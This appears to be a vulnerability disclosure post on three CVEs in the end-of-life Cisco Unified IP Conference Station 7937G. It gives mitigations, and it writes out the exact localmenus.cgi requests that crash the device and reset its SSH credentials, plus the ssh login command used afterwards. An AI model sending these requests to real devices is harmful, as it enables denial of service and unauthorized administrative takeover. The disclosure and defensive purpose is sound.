Multiple CVEs: Cisco Unified IP Conference Station 7937G
Cisco: CVE-2020-16139, CVE-2020-16138, CVE-2020-16137: Unified IP Conference Station 7937G
Multiple vulnerabilities were discovered in the Cisco Unified IP Conference Station 7937G including two denial-of-service flaws (CVE-2020-16139, CVE-2020-16138) and a path to privilege escalation (CVE-2020-16137) via the web administration portal. Since this product has reached end-of-support/end-of-life by Cisco, no updates to the affected firmware will be provided. There are workarounds to mitigate any potential impact you may have as a result of these findings.
Background
Most of the issues discovered stem from the device’s usage of the localmenus.cgi script. While testing the device, it was noted that the same XML menu generation being done in the web administration portal was mirrored on the physical device’s menu system. This led to the belief that whatever you could do administratively to the physical device could also be done through the web interface.
localmenus.cgi takes as a parameter func, which requires an integer value. Capturing the request and enumerating the likely value range 0-1000, I was able to isolate functionalities that were not visible to the web interface. These include benign and silly tricks like changing volumes, contrast values, ringtones, etc. It also allows for other unsavory actions.
CVE-2020-16139: Denial-of-Service
The first of two denial of service vulnerabilities is caused by accessing the device’s ping functionality through the web administration portal. This can be done by iterating the func parameter and navigating to func=607. This page directs you to another valid parameter combination for executing the ping request, func=609&rphl=1&data=. Here, data is the parameter of interest, as it is where you would normally place an IP address to ping against. For my testing, I instead sent it 46 A repeatedly. Normal usage of the ping function through the physical menu system clears out the ping output after the task is completed, however executing it directly like this leaves the response information.
/localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASending the request repeatedly causes the device to power cycle itself around the time the resulting content-length reaches about 16,316. This vulnerability can be easily mitigated by disabling the web interface in your configuration files.
If you are enjoying this article your support would be greatly appreciated!
CVE-2020-16138: Denial-of-Service
The second of the denial-of-service vulnerabilities is caused by mishandling SSH connection attempts made with unsupported key exchange algorithms. The specific cause of the problem is not known as of yet, and further investigations will be done to try to isolate the cause. The following algorithms are supported, and connecting with any of them will avoid triggering the DoS:
diffie-hellman-group-exchange-sha1diffie-hellman-group14-sha1diffie-hellman-group1-sha1
With an updated SSH client, connecting to the system with default options will cause the DoS. Unlike the previous vulnerability, the device will become inoperable but will not restart until power cycled manually. This situation can be mitigated by disabling SSH access to the device in your configuration files.
CVE-2020-16137 - Privilege Escalation
The last of the vulnerabilities found so far is a path to privilege escalation. It relies on both web access and SSH access being enabled. We return to the web interface to take advantage of other hidden functionality with the localmenus.cgi script. Navigating to func=403&set=401 and func=403&set=402 reveals menus for changing the SSH username and password respectively. These pages will overwrite any currently set credentials for administrative SSH access, or set credentials if none were set previously.
To change the username, simply replace the values for user1 and user2 with whatever you want your new username to be:
/localmenus.cgi?func=403&set=401&name1=test&name2=testTo change the password, replace the values for pwd1 and pwd2 with whatever you want your new password to be:
/localmenus.cgi?func=403&set=402&pwd1=test&pwd2=testNow simply connect with SSH to your now accessible administrative console, specifying a valid key exchange algorithm:
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@DEVICE-IPTo mitigate this issue, it is recommended that SSH access be disabled, or web access be disabled. If SSH access is needed for legitimate purposes, disabling web access will remove an attacker’s ability to reset the username and password arbitrarily, though the device will still be vulnerable to the before-mentioned denial-of-service attack.
Public Exploit Proofs of Concept
As part of this publication, three Metasploit modules were released to test for the vulnerabilities discovered, as well as an all in one exploiter that can be used when Metasploit is not preferred. They can be found here: Cisco-7937G-PoCs
References
- Original Post
- CVE-2020-16137: https://nvd.nist.gov/vuln/detail/CVE-2020-16137
- CVE-2020-16138: https://nvd.nist.gov/vuln/detail/CVE-2020-16138
- CVE-2020-16139: https://nvd.nist.gov/vuln/detail/CVE-2020-16139